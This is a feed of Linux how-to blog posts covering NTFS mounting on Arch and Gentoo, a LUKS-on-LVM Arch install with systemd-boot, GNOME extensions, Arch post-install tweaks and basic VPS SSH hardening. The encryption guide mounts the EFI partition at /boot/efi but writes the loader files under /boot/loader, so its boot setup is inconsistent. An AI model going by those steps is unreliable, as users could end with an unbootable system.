The need to interact with NTFS filesystems, commonly used by Windows operating systems, is not limited to a specific Linux distribution. Both Arch Linux and Gentoo users may encounter challenges when attempting to mount NTFS partitions. Fortunately, both distributions offer solutions to address this issue and enable seamless interaction with NTFS filesystems.

## The Common Challenge

Whether you&apos;re using Arch Linux or Gentoo, you might encounter the frustrating error message:

```shell
mount: unknown filesystem type &apos;ntfs&apos;. dmesg(1) may have more information after a failed mount system call.
```

This error is a result of the modular nature of both Arch Linux and Gentoo, which requires users to take proactive steps to enable NTFS filesystem support.

## The Solution: Installing `ntfs-3g`

To ensure cross-platform compatibility and overcome the &apos;unknown filesystem type ntfs&apos; error, you need to install the `ntfs-3g` package. This package equips your system with the necessary tools to handle NTFS filesystems effectively.

### Installing on Arch Linux

To install the `ntfs-3g` package on Arch Linux, execute the following command in your terminal:

```shell
sudo pacman -S ntfs-3g
```

By taking this simple step, you ensure that your Arch Linux system has the capability to interact with NTFS partitions, enhancing your cross-platform compatibility and eliminating obstacles when accessing files stored on NTFS drives.

### Installing on Gentoo

Similarly, Gentoo Linux provides a flexible environment that allows users to tailor their system components. To install the `ntfs-3g` package on Gentoo, execute the following command in your terminal:

```shell
sudo emerge sys-fs/ntfs3g
```

By embracing this solution, you enable your Gentoo Linux system to work seamlessly with NTFS filesystems, enhancing your ability to collaborate and manage files across different platforms.
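Before mounting anything, you can check which partitions on your system are actually NTFS. A small read-only sketch (it prints a fallback message when none are found):

```shell
# List filesystems and filter for NTFS; safe to run at any time
out=$(lsblk -f 2>/dev/null | grep -i ntfs || echo 'no NTFS partitions detected')
echo "$out"
```

Once you have identified the partition, mount it with, for example, `sudo mount -t ntfs-3g /dev/sdX1 /mnt/windows`, replacing the device and mount point with your own.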

## Embracing Compatibility

Both Arch Linux and Gentoo Linux demonstrate their adaptability and user-centric philosophy by offering solutions to enable NTFS compatibility. By installing the `ntfs-3g` package, you ensure that your Linux environment can effortlessly interact with Windows-based filesystems, fostering efficient data exchange and collaboration.

## Conclusion

Adding NTFS filesystem support on Arch Linux and Gentoo is a crucial step toward achieving a seamless cross-platform experience. Both distributions provide straightforward solutions to address the compatibility challenge, highlighting their commitment to user empowerment and system customization. By implementing these solutions, you empower your Linux environment to work harmoniously with Windows-based systems, enhancing your ability to manage and share data across different platforms.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Complete Guide to setting up LUKS on LVM encryption in Arch Linux (Minimal System)</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-luks-encryption-fully-install-systemd/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-luks-encryption-fully-install-systemd/</guid><description>A detailed guide on setting up LUKS (Linux Unified Key Setup) encryption on LVM. with Minimal system installation.</description><pubDate>Wed, 09 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Setting Up LUKS Encryption

Welcome to a detailed guide on setting up LUKS (Linux Unified Key Setup) encryption (LVM) as part of your Arch Linux installation process. LUKS encryption provides an additional layer of security for your data.

## Enabling Time Synchronization

Before delving into encryption, it&apos;s essential to ensure accurate timekeeping on your system. Enabling Network Time Protocol (NTP) synchronization will synchronize your system&apos;s clock with remote servers.

```shell
timedatectl set-ntp true
```

## Partition Setup

Before installing Arch Linux, you need to partition your disk. You can use tools like `cfdisk`, `fdisk`, or `gdisk` for this purpose. In this guide, we will use `gdisk`.

The partition layout will use LVM, so the disk only needs two partitions.

1. First, identify the storage device you want to partition and note its name. You can list the available storage devices using the following command:

```shell
lsblk
```

2. Initialize and Create Partitions: Utilize the `gdisk` tool to initialize your disk and create the necessary partitions:

```shell
gdisk /dev/sda
```

   While inside the `gdisk` interface, execute the following actions:

   - Type `o` to create a new GPT partition table and confirm with `y`.
   - Create the EFI boot partition by typing `n`, pressing `Enter` to accept the default first sector, entering `+1G` for the last sector, and `ef00` for the partition type code.
   - Create the partition for LUKS (which will contain LVM) by typing `n`, pressing `Enter` at each prompt until the type code prompt, then entering `8e00` for the partition type code.
   - Save your modifications with `w` and confirm the changes by typing `y`.

Your disk should now have the following partitions:

| Size   | Type                | Code  |
|--------|---------------------|-------|
| 1G     | EFI System          | ef00  |
| 100G   | Linux LVM           | 8e00  |

## Format Boot Partition

Our partition layout is ready; now we need to format the partitions. We will start with the EFI boot partition, which must be formatted as FAT32 to meet UEFI booting requirements.

```shell
mkfs.fat -F32 /dev/sda1
```

## Encrypt Your Partition (LUKS)

Configure encryption using LUKS (Linux Unified Key Setup) and create logical volumes to efficiently manage your filesystem.

```shell
cryptsetup luksFormat --type luks2 --cipher aes-xts-plain64 --hash sha256 --iter-time 10000 --key-size 256 --pbkdf argon2id --use-urandom --verify-passphrase /dev/sda2
```

This command initiates the LUKS encryption process with specific parameters:

- `--type luks2`: Selects LUKS version 2 for encryption.
- `--cipher aes-xts-plain64`: Chooses the AES encryption algorithm in XTS mode.
- `--hash sha256`: Specifies SHA-256 as the hash function.
- `--iter-time 10000`: Sets the key derivation iteration time to 10,000 milliseconds.
- `--key-size 256`: Determines the key size in bits.
- `--pbkdf argon2id`: Selects the Argon2id key derivation function.
- `--use-urandom`: Utilizes the `/dev/urandom` entropy source.
- `--verify-passphrase`: Ensures you verify your chosen passphrase.

Type `YES` (in uppercase) when asked to confirm overwriting the partition, then enter your chosen passphrase when prompted. Remember that this passphrase will be required to unlock the encrypted partition at every boot.

## Open the Encrypted Partition

The LUKS partition is now encrypted. To open it:

```shell
cryptsetup open /dev/sda2 crypt
```

This command opens the encrypted partition and maps it to a new device named `crypt`, available at `/dev/mapper/crypt`.

## Create Physical and Logical Volumes

Next, you&apos;ll create physical and logical volumes to manage your filesystem efficiently. These volumes will serve as the foundation for your Arch Linux installation.

Create a physical volume:

```shell
pvcreate /dev/mapper/crypt
```

Create a volume group named `vol`:

```shell
vgcreate vol /dev/mapper/crypt
```

Create logical volumes for swap, root, and home directories:

```shell
lvcreate -L 12G vol -n swap
lvcreate -l 50%FREE vol -n root
lvcreate -l 100%FREE vol -n home
```

These commands create logical volumes for the swap, root, and home directories. The `-l 50%FREE` option gives root half of the space remaining after swap, and `-l 100%FREE` gives home everything left after that.

## Format and Mount Partitions

In this step, we will format and mount the partitions necessary for the Arch Linux installation. Properly configuring these partitions is crucial for ensuring a stable and functional system. We&apos;ll cover formatting the `root` and `home` volumes, as well as creating and enabling swap space. Let&apos;s delve into the details:

### Root and Home

We&apos;ll need to format the `root` and `home` volumes with the Btrfs filesystem. To do so, execute the following command:

```shell
mkfs.btrfs /dev/vol/root &amp;&amp; mkfs.btrfs /dev/vol/home
```

### Swap

Swap space is an integral part of your system&apos;s memory management. It provides additional virtual memory when physical RAM is fully utilized. Creating and enabling swap space ensures that your system can handle memory-intensive tasks without performance degradation.

To create and enable swap space on the designated `swap` logical volume, use these commands:

```shell
mkswap /dev/vol/swap &amp;&amp; swapon /dev/vol/swap
```

### Mount Root and Home Partitions

Time to mount the `root` and `home` partitions to the `/mnt` directory. Execute the following commands:

```shell
mount /dev/vol/root /mnt
```

```shell
mount /dev/vol/home --mkdir /mnt/home
```

&gt;The EFI partition will not be mounted here; we&apos;ll mount it after chrooting into the new system.

## Install Essential Packages

This is the time to install essential packages that form the core of your Arch Linux system. These packages provide foundational tools and utilities that enable system management, software development, and hardware compatibility.

```shell
pacstrap -i /mnt base base-devel linux linux-firmware linux-headers lvm2 vim networkmanager sudo
```

## Automate Mounts with the `fstab` File

To ensure that your filesystems are automatically mounted during system boot, you need to generate the `/etc/fstab` file. This file contains information about your partitions and their mount points, enabling the system to mount them correctly.

```shell
genfstab -U /mnt &gt;&gt; /mnt/etc/fstab
```

## Chroot into the New System

To enter this new system environment, type the following command:

```shell
arch-chroot /mnt
```

## Initialize the Pacman Keyring

It is good practice to initialize and refresh the pacman keyring. Execute the following commands:

```shell
pacman-key --init &amp;&amp; pacman-key --populate archlinux
```

## Enable Network Services

Enable the NetworkManager service to manage network connections.

```shell
systemctl enable NetworkManager
```

## Set the System Locale

Configuring the system locale is an essential task to ensure proper language support and effective localization within your Arch Linux environment. The system locale defines the language, character encoding, and other regional settings that your system will use.

Execute the following command to open the `locale.gen` file in the `vim` text editor:

```shell
vim /etc/locale.gen
```

1. Inside the text editor, navigate to the line that corresponds to your desired locale. For instance, to enable the English (United States) locale, find the line containing `en_US.UTF-8` and remove the `#` symbol at the beginning of the line.

2. Save the file and exit the text editor.

3. Generate the selected locale by running the command:

```shell
locale-gen
```

This command generates the necessary locale files based on your configuration.

4. Set the system&apos;s default locale by entering the following command:

```shell
echo LANG=en_US.UTF-8 &gt; /etc/locale.conf
```

## Set User Passwords

User account management is a crucial aspect of system security. Follow these steps to establish secure passwords for both the root user and a new user:

1. Set the root password by entering the following command and following the prompts:

```shell
passwd
```

2. Create a new user account using the `useradd` command. Replace `username` with the desired username:

```shell
useradd -m username
```

3. Set the password for the newly created user by running the following command and following the prompts:

```shell
passwd username
```

## Basic group allocation

To ensure that your user account has the necessary permissions to perform system tasks, allocate the user to essential groups.

```shell
usermod -aG wheel,storage,power username
```

## Configure sudoers file

Using `sudo` is not allowed by default; you need to enable it for the `wheel` group by editing the sudoers file.

```shell
EDITOR=vim visudo
```

Then, uncomment the line `%wheel ALL=(ALL) ALL` by removing the `#` symbol at the beginning of the line.

### Timestamp Timeout

Note that setting `timestamp_timeout` to 0 disables credential caching, so `sudo` asks for your password on every invocation. If you prefer this stricter behaviour, add the following line via `visudo`:

```shell
Defaults timestamp_timeout=0
```

## Set Hostname

Assigning a hostname to your Arch Linux system is essential for network identification. As an example, we will set the hostname to `arch`.

```shell
echo arch &gt; /etc/hostname
```

## Set Hosts File

To associate the hostname with the loopback address, modify the `/etc/hosts` file, adding the following line:

```shell
127.0.0.1 localhost
::1       localhost
127.0.1.1 arch.localdomain arch
```

## Set Timezone

Configuring the correct timezone ensures accurate timekeeping on your Arch Linux system. To do this, create a symbolic link to the appropriate timezone file and synchronize the hardware clock with the system time. As an example, we will set the timezone to `Asia/Taipei`.

```shell
ln -sf /usr/share/zoneinfo/Asia/Taipei /etc/localtime
```

Synchronize the hardware clock with the system time:

```shell
hwclock --systohc
```

## Configure mkinitcpio

You need to configure `mkinitcpio` to include necessary modules for LVM2 and encryption support. This step ensures your encrypted partitions can be properly accessed during the boot process. Edit the `/etc/mkinitcpio.conf` file:

1. Locate the `HOOKS` line and add `encrypt` and `lvm2` to the list of hooks. Order matters here: `encrypt` must come before `lvm2`, because the LUKS partition has to be unlocked before LVM can activate the volumes inside it. Your modified line should look like this:

   ```shell
   HOOKS=(base udev autodetect modconf kms keyboard keymap consolefont block encrypt lvm2 filesystems fsck)
   ```

2. Save the file and exit the text editor.

3. Regenerate the initramfs with the updated configuration:

   ```shell
   mkinitcpio -p linux
   ```
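The `HOOKS` edit can also be scripted. A sketch demonstrated on a stand-in file (the real target is `/etc/mkinitcpio.conf`); the substitution places `encrypt` before `lvm2`, since the partition must be unlocked before LVM can activate the volumes inside it:

```shell
# Stand-in for /etc/mkinitcpio.conf with a default-style HOOKS line
printf 'HOOKS=(base udev autodetect modconf kms keyboard keymap consolefont block filesystems fsck)\n' > /tmp/mkinitcpio-demo.conf
# Insert the encrypt and lvm2 hooks just before filesystems
sed -i 's/block filesystems/block encrypt lvm2 filesystems/' /tmp/mkinitcpio-demo.conf
grep '^HOOKS' /tmp/mkinitcpio-demo.conf
```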

## Mount the EFI Partition

The EFI partition was already formatted as FAT32 earlier, so it only needs to be mounted at `/boot/efi` now. Execute the following command:

```shell
mount /dev/sda1 --mkdir /boot/efi
```

## Install and Configure Bootctl

Now, we&apos;ll configure the systemd-boot bootloader to manage the boot process for your Arch Linux system.

1. Install systemd-boot to the `/boot/efi` directory using `bootctl`:

   ```shell
   bootctl --path=/boot/efi install
   ```

2. Open the `loader.conf` file for editing using the `vim` text editor:

   ```shell
   vim /boot/loader/loader.conf
   ```

3. Inside the text editor, add the following lines to set the default boot options:

   ```shell
   default arch
   timeout 10
   editor 0
   ```

4. Save the file and exit the text editor.

5. Create a boot entry for your Arch Linux installation in the bootloader configuration. This ensures that you can easily select Arch Linux during boot.

   ```shell
   vim /boot/loader/entries/arch.conf
   ```

6. Inside the text editor, add the following lines to specify the Linux kernel and initramfs files:

   ```shell
   title Arch Linux
   linux /vmlinuz-linux
   initrd /initramfs-linux.img
   ```

7. Save the file and exit the text editor.

### Add Encryption Options

To ensure that your encrypted partition is properly decrypted during the boot process, you need to add encryption options to the bootloader configuration. This step is crucial for seamless decryption and access to your encrypted root volume.

1. Add the UUID of the encrypted partition to the bootloader configuration. First, obtain the UUID of the encrypted partition using the `blkid` command:

    ```shell
    blkid /dev/sda2 &gt;&gt; /boot/loader/entries/arch.conf
    ```

2. Now, reopen the `arch.conf` file for further editing:

   ```shell
   vim /boot/loader/entries/arch.conf
   ```

3. Replace the appended `blkid` output with a single `options` line that specifies the encryption parameters, substituting `&lt;UUID&gt;` with the actual UUID obtained in the previous step:

   ```shell
   options cryptdevice=UUID=&lt;UUID&gt;:cryptlvm root=/dev/vol/root quiet rw
   ```

4. Save the file and exit the text editor.

#### Finalize Boot Configuration

If you have done everything correctly, your completed `arch.conf` file should look similar to this sample:

```shell
title Arch Linux
linux /vmlinuz-linux
initrd /initramfs-linux.img

options cryptdevice=UUID=&lt;UUID&gt;:cryptlvm root=/dev/vol/root quiet rw
```
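Instead of appending raw `blkid` output and editing it by hand, the entry can be generated in one step. A sketch with a stubbed UUID so it runs anywhere; on a real system, use the `blkid -s UUID -o value` lookup shown in the comment:

```shell
# Stub UUID for the demo; on a real system use:
#   uuid=$(blkid -s UUID -o value /dev/sda2)
uuid="0000-demo-uuid"
printf 'title Arch Linux\nlinux /vmlinuz-linux\ninitrd /initramfs-linux.img\noptions cryptdevice=UUID=%s:cryptlvm root=/dev/vol/root quiet rw\n' "$uuid" > /tmp/arch.conf
grep 'cryptdevice' /tmp/arch.conf
```

Write the result to `/boot/loader/entries/arch.conf` rather than `/tmp` when doing this for real.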

## Finish Installation

After completing these steps, exit the chroot environment and unmount your new Arch system. You can then enjoy your new Arch Linux system with LUKS encryption. (But no GUI XD)

```shell
exit
umount -R /mnt
```

Finally, you can proceed to reboot your system.

```shell
reboot
```

## References

- [No mkinitcpio preset present](https://unix.stackexchange.com/questions/571124/no-mkinitcpio-preset-present)
- [Installation guide](https://wiki.archlinux.org/title/Installation_guide)
- [How to Dual Boot Arch Linux and Windows 11/10](https://onion.tube/watch?v=JRdYSGh-g3s)
- [Como instalar ArchLinux com UEFI criptografia LUKS](https://onion.tube/watch?v=K4pcd0B_eGk)
- [[1d] | Arch Linux Base Install on UEFI with LUKS Encryption](https://onion.tube/watch?v=XNJ4oKla8B0)
- [Create LUKS encrypted root and efi boot partitions for Arch Linux](https://onion.tube/watch?v=cxMYR617a5E)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Discover the Top 10 Essential Gnome Extensions</title><link>https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-useful-extensions/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-useful-extensions/</guid><description>Unlock the Power of Gnome with These Must-Have Extensions!</description><pubDate>Fri, 04 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

GNOME extensions are plug-ins that enhance your experience of the GNOME desktop. In this article, I will list some GNOME extensions that I find useful.

## How to install

Enhance your GNOME desktop experience by effortlessly installing useful extensions through your web browser. Follow these steps for a smooth setup:

### 1. Install Browser Extensions

First, go to this [website](https://extensions.gnome.org/) and install the GNOME Shell integration extension. Without this browser extension, you cannot install GNOME extensions from your browser.

### 2. Install the GNOME Browser Connector

To enable seamless extension installation and connect the browser integration to your desktop, install the GNOME browser connector package on your system:

```shell
sudo pacman -S gnome-browser-connector
```

### 3. Recommended Extensions

Explore these recommended GNOME extensions that can enhance your desktop functionality:

#### KStatus
- **Link**: [KStatus Extension](https://extensions.gnome.org/extension/615/appindicator-support/)
- **Description**: This extension provides support for app indicators, making it easier to manage and access applications from your system tray.

#### Clipboard History
- **Link**: [Clipboard History Extension](https://extensions.gnome.org/extension/4839/clipboard-history/)
- **Description**: Manage and access a history of your clipboard contents for more efficient copying and pasting.

#### Dash to Dock
- **Link**: [Dash to Dock Extension](https://extensions.gnome.org/extension/307/dash-to-dock/)
- **Description**: Transform your GNOME dash into a dock-style interface, allowing quick access to your favorite applications and improved multitasking.

#### Kernel Indicator
- **Link**: [Kernel Indicator Extension](https://extensions.gnome.org/extension/2512/kernel-indicator/)
- **Description**: Monitor and display your kernel version conveniently in your top panel, keeping you informed about your system&apos;s core.

#### Panel Date Format
- **Link**: [Panel Date Format Extension](https://extensions.gnome.org/extension/3465/panel-date-format/)
- **Description**: Customize the date and time format in your top panel to match your preferences and stay organized.

#### Resource Monitor
- **Link**: [Resource Monitor Extension](https://extensions.gnome.org/extension/1634/resource-monitor/)
- **Description**: Keep a close eye on your system&apos;s resource usage with a dedicated resource monitor directly in your top panel.

#### TopHat
- **Link**: [TopHat Extension](https://extensions.gnome.org/extension/5219/tophat/)
- **Description**: TopHat aims to be an elegant system resource monitor for the GNOME shell. It displays CPU, memory, disk, and network activity in the GNOME top bar.

#### Blur my Shell
- **Link**: [Blur my Shell](https://extensions.gnome.org/extension/3193/blur-my-shell/)
- **Description**: Adds a blur look to different parts of the GNOME Shell, including the top panel, dash and overview.

By effortlessly installing these extensions, you can tailor your GNOME desktop to your workflow, optimizing productivity and functionality.

## Conclusion

Installing GNOME extensions using your web browser is a convenient way to personalize and enhance your desktop environment. With the help of the GNOME Browser Connector and a selection of recommended extensions, you can seamlessly add new features and improve your daily computing experience. Experiment with different extensions to discover the ones that best suit your needs and streamline your workflow.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>After installed Arch Linux 10 key common tasks</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-after-install-most-do-things/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-after-install-most-do-things/</guid><description>top 10 crucial tasks to perform after installing Arch Linux for an optimized and enriched experience.</description><pubDate>Fri, 04 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Setting Up Arch Linux (Keep update)

Once you have Arch Linux installed, there are a few key tasks you should complete to optimize your experience. Let&apos;s walk through them:

As an Arch Linux user, installing extra packages is optional, but there are some common tasks you will likely want to do after installing Arch Linux :)

### 1. Activate Multilib Repositories

Enhance your Arch Linux system&apos;s versatility by enabling the multilib repositories, which provide support for running both 32-bit and 64-bit applications. Follow these steps to activate multilib repositories:

1. Open your terminal application.

2. Type the following command and press Enter to open the `pacman.conf` file in the vim text editor:

   ```shell
   sudo vim /etc/pacman.conf
   ```

3. In the text editor, navigate to the `[multilib]` section. By default it is commented out and looks like this:

   ```plaintext
   #[multilib]
   #Include = /etc/pacman.d/mirrorlist
   ```

4. Remove the `#` character at the beginning of both the `[multilib]` line and the `Include` line below it.

5. Save the changes and exit the editor. Since the file was opened in `vim`, press `Esc`, then type `:wq` and press Enter.

6. To update the package database and synchronize the multilib repositories for the first time, execute the following command:

```shell
sudo pacman -Sy
```

By completing these steps, you&apos;ve successfully activated the multilib repositories on your Arch Linux system. This enables you to run a wider range of applications and ensures better compatibility.
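The two-line uncomment can be automated with `sed`. A sketch against a stand-in file (the real target is `/etc/pacman.conf`); it uncomments both the `[multilib]` header and its `Include` line:

```shell
# Stand-in file with the multilib section commented out, as shipped by default
printf '#[multilib]\n#Include = /etc/pacman.d/mirrorlist\n' > /tmp/pacman-demo.conf
# Uncomment the section header and the line directly after it (GNU sed)
sed -i '/^#\[multilib\]/,+1 s/^#//' /tmp/pacman-demo.conf
cat /tmp/pacman-demo.conf
```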

### 2. Optimize Package Mirrors with Reflector

Using the default mirrorlist is not the best approach, since its mirrors may be far from your location. With Reflector, you can generate a mirrorlist of fast mirrors for a country of your choice. Here are the steps:

1. Run the following command to install reflector:

```shell
sudo pacman -S reflector
```

2. Get the latest 10 mirrors for your country, sorted by download rate, and save them as your mirrorlist:

```shell
sudo reflector --verbose --country &lt;your_country&gt; -l 10 --sort rate --save /etc/pacman.d/mirrorlist --protocol https
```

- `--protocol https`: Specifies to use HTTPS protocol for fetching mirror information.
- `--country &lt;your_country_code&gt;`: Replace `&lt;your_country_code&gt;` with the code of your country (e.g., `us` for the United States, `ca` for Canada).
- `--verbose`: Enables verbose output to see the log of the process.
- `-l 10`: Retrieves the latest 10 mirrors based on specified criteria.
- `--sort rate`: Sorts the mirrors by download rate (speed).
- `--save /etc/pacman.d/mirrorlist`: Saves the optimized mirrorlist to the specified path.

3. Update the package database against the new mirrorlist:

   ```shell
   sudo pacman -Sy
   ```

With the optimized mirrorlist in place, you&apos;ll get faster and more reliable package downloads.
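
Before Reflector overwrites `/etc/pacman.d/mirrorlist`, it&apos;s also sensible to keep a copy. A tiny helper like this (the `backup_file` name is just an illustration) copies any file to a dated `.bak` next to it:

```shell
# backup_file: copy a file to file.YYYY-MM-DD.bak before modifying it
backup_file() {
  cp -- "$1" "$1.$(date +%F).bak"
}

# For files under /etc, run the copy with sudo, e.g.:
# sudo cp /etc/pacman.d/mirrorlist "/etc/pacman.d/mirrorlist.$(date +%F).bak"
```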

### 3. Enhance Visual Experience

Elevate your Arch Linux environment with captivating visual enhancements. Follow these simple steps to breathe life into your interface:

#### 3.1 Enable &quot;Candy&quot; Animation with `ILoveCandy`

Enhance your download progress visualization with the playful &quot;Candy&quot; animation, which turns the progress bar into a little Pac-Man eating its way across the screen. Follow these steps to enable it:

1. Open your terminal and type the following command, then press Enter:

   ```shell
   sudo vim /etc/pacman.conf
   ```

2. Inside the text editor, navigate to the `[options]` section.

3. Add this line to enable the &quot;Candy&quot; animation (it is not present in the file by default):

   ```shell
   ILoveCandy
   ```

4. Save the file and exit: press `Esc`, type `:wq`, then press Enter.

5. Your progress bar will now display the engaging &quot;Candy&quot; animation!

#### 3.2 Infuse Vibrancy with &quot;Color&quot;

Enhance the clarity of your verbose information by enabling colorful output with the &quot;Color&quot; setting. Say goodbye to plain black and white text:

1. Open your terminal application.

2. Type the following command and press Enter:

   ```shell
   sudo vim /etc/pacman.conf
   ```

3. In the text editor, locate the `[options]` section.

4. Uncomment this flag to enable colorful output:

   ```shell
   Color
   ```

5. Save the file and exit: press `Esc`, type `:wq`, then press Enter.

#### 3.3 Clearer Verbose Information with &quot;VerbosePkgLists&quot;

Make your package information crystal clear by enabling &quot;VerbosePkgLists.&quot; This option separates each package onto its own line, displaying both the old and new versions distinctly:

1. Open your terminal and type the following command, then press Enter:

   ```shell
   sudo vim /etc/pacman.conf
   ```

2. Inside the text editor, locate the `[options]` section.

3. Uncomment this flag to enable VerbosePkgLists output:

   ```shell
   VerbosePkgLists
   ```

4. Save the file and exit: press `Esc`, type `:wq`, then press Enter.

### 4. Multi-threaded Package Downloads with `ParallelDownloads`

Optimize your package downloads by fetching multiple files at once with `ParallelDownloads`, available in pacman 6 and later. Instead of downloading one file at a time, you can specify the number of concurrent downloads to speed up the process:

1. Open your terminal and type the following command, then press Enter:

   ```shell
   sudo vim /etc/pacman.conf
   ```

2. Inside the text editor, locate the `[options]` section.

3. Uncomment (or add) the following line to allow, for example, 5 concurrent downloads:

   ```shell
   ParallelDownloads = 5
   ```

4. Save the file and exit: press `Esc`, type `:wq`, then press Enter.

Now you can enjoy faster downloads with the ability to retrieve multiple files simultaneously!
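
Here too the edit can be previewed non-interactively. This sketch assumes the stock `#ParallelDownloads = 5` comment that ships with pacman 6; apply it for real with `sudo sed -i` on `/etc/pacman.conf`:

```shell
# Preview: uncomment the stock ParallelDownloads line
printf '#ParallelDownloads = 5\n' \
  | sed 's/^#ParallelDownloads/ParallelDownloads/'
```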

### 5. Install Game Drivers (AMDGPU Users)

For those using AMDGPU, elevate your gaming potential. Execute:

```shell
sudo pacman -Sy
sudo pacman -S lib32-mesa mesa \
lib32-vulkan-radeon vulkan-radeon \
amdvlk \
xf86-video-amdgpu
```

### 6. Gnome Users: Enhance Browsing Experience

For Gnome users, elevate your browsing capabilities with the gnome-browser-connector. Install it using:

```shell
sudo pacman -S gnome-browser-connector
```

Once installed, you&apos;ll be able to effortlessly install extensions from [https://extensions.gnome.org/](https://extensions.gnome.org/).

By completing these tasks, you&apos;ll optimize your Arch Linux environment, enriching your experience and unleashing its full potential. Enjoy your enhanced system!

### 7. Customize Your GNOME Environment

Arch Linux offers a default GNOME environment that&apos;s visually appealing, but you can still customize it to reflect your unique style and preferences.

### 8. Install Yay AUR Helper

`yay` is a popular AUR helper that simplifies software management on Arch Linux, streamlining the acquisition and organization of software from the Arch User Repository (AUR), a vibrant hub of community-contributed packages. It wraps pacman, so the familiar flags work for both official and AUR packages.

1. **Install Git and Essential Development Tools:**

   Start by laying a solid foundation: `git` plus the build tools from the `base-devel` package group. If these are not present, you can install them with the command:

   ```shell
   sudo pacman -S git base base-devel
   ```

2. **Installing `yay` for Customization:**

   If you&apos;re inclined towards customization and don&apos;t mind investing a bit more time, consider building `yay` from source. Begin by cloning the `yay` repository from the Arch User Repository (AUR) using:

   ```shell
   git clone https://aur.archlinux.org/yay.git
   ```

   Navigate to the cloned `yay` folder:

   ```shell
   cd yay
   ```

   Build and install `yay` with the following commands:

   ```shell
   makepkg -si
   ```

   Respond to prompts and grant necessary permissions during installation.

3. **Start Using `yay`:**

   ```shell
   yay -S &lt;package-name&gt;
   ```
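
Because `yay` wraps pacman, the familiar flags carry over. A few everyday operations look like this (`keyword` and `package-name` are placeholders):

```shell
yay -Syu                # upgrade official and AUR packages together
yay -Ss keyword         # search the repositories and the AUR
yay -Rns package-name   # remove a package and its unneeded dependencies
```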

### 9. Install Your Daily Software

With your Arch Linux system set up and customized, it&apos;s time to install some essential software that you use on a daily basis.
Both Firefox and VLC are in the official repositories, so you can install them with `pacman` (or with `yay`, which wraps it).

#### Install Firefox

To install Firefox, use the following command:

```shell
sudo pacman -S firefox
```

#### Install VLC

To install VLC media player, use the following command:

```shell
sudo pacman -S vlc
```

With Firefox and VLC installed, you now have access to a web browser and media player, allowing you to browse the web and enjoy multimedia content on your Arch Linux system.

### 10. Install Firewall (UFW)

When it comes to securing your system, a firewall plays a crucial role in controlling incoming and outgoing network traffic. While Arch Linux doesn&apos;t come with a pre-installed firewall, you can easily set up the Uncomplicated Firewall (UFW) to manage network access.

#### Install UFW

Open a terminal and enter the following command:

```shell
sudo pacman -S ufw
```

#### Enable UFW

After installing UFW, activate it and enable the service so it starts at boot:

```shell
sudo ufw enable
sudo systemctl enable ufw.service
```

Once UFW is enabled, you can start managing your firewall rules to enhance the security of your Arch Linux system. Don&apos;t forget to configure UFW rules to allow necessary network services while blocking unauthorized access.
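
As a sketch of that rule management, allowing a couple of common services might look like this; the services and ports are examples to adapt to what your machine actually runs:

```shell
sudo ufw allow ssh        # or a custom port, e.g. sudo ufw allow 2222/tcp
sudo ufw allow 443/tcp    # example: HTTPS for a web server
sudo ufw status verbose   # review the active rules
```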

## Conclusion

By following these steps, you&apos;ve covered some of the most essential tasks to set up and optimize your Arch Linux system for daily use. Whether you&apos;re browsing the web, enjoying multimedia, or ensuring network security, you&apos;re well-equipped to make the most out of your Arch Linux experience.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Tips to Secure your linux VPS server</title><link>https://ummit.dev//posts/linux/self-host/ssh-secure/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/self-host/ssh-secure/</guid><description>Learn how to effortlessly secure your VPS server with just a few essential steps. This blog will guide you through the process.</description><pubDate>Wed, 28 Jun 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Securing your VPS hosting server is paramount before exposing it to the public. Here&apos;s how you can bolster your server&apos;s defenses.

### 1. Regularly Update Your System

Keeping your Linux system up to date is vital for security. Regularly apply security updates using the following commands:

```shell
sudo apt-get update -y
sudo apt-get upgrade -y
```

### 2. Add a New User with Sudo Privileges

Improving security involves creating a new user with administrative capabilities:

1. Create a New User:
   Add a new user to your system, replacing `newusername` with your preferred username.

   ```shell
   sudo adduser newusername
   ```

2. Grant Sudo Privileges:
   Enable the new user to use the `sudo` command by adding them to the sudo group.

   ```shell
   sudo usermod -aG sudo newusername
   ```

3. Test Sudo Access:
   Verify that the new user can use `sudo` by switching to their account and running a test command.

   ```shell
   su - newusername
   sudo ls -la /root
   ```

4. Exit User Account:
   Once the test is complete, exit the new user&apos;s account.

   ```shell
   exit
   ```

5. Access sudoers File (alternative method):
   Step 2 already grants sudo through the sudo group. If you instead prefer an explicit per-user entry, edit the sudoers file:

   - If you&apos;re currently logged in as root:

   ```shell
   visudo
   ```

   - If you&apos;re logged in as a non-root user with sudo privileges:

   ```shell
   sudo visudo
   ```

6. Edit with Ease:
   The visudo command typically uses the nano text editor, making it user-friendly. Navigate with arrow keys and locate the line resembling:

   ```shell
   root    ALL=(ALL:ALL) ALL
   ```

7. Add User to sudoers:
   Below the mentioned line, add the highlighted line (replace `newuser` with the actual username):

   ```shell
   root    ALL=(ALL:ALL) ALL
   newusername ALL=(ALL:ALL) ALL
   ```

8. Save and Exit:
   Save your changes and exit the editor.

These steps grant specific users sudo privileges, allowing them to execute administrative commands while maintaining a secure server environment.

### 3. Avoid Password Login

Enhance security by disabling password-based logins and exclusively utilizing SSH key authentication. Make sure your SSH key login already works first, or you may lock yourself out. Set the following option in `/etc/ssh/sshd_config`, then restart the SSH service:

```shell
PasswordAuthentication no
```
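
As an assumed (non-authoritative) workflow, the whole change can be scripted: edit the option, validate the configuration, then restart the service. The `sed` pattern presumes a single `PasswordAuthentication` line in the file:

```shell
sudo sed -i -E 's/^#?PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
sudo sshd -t                  # validate the config before restarting
sudo systemctl restart sshd   # the unit is named ssh on some distributions
```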

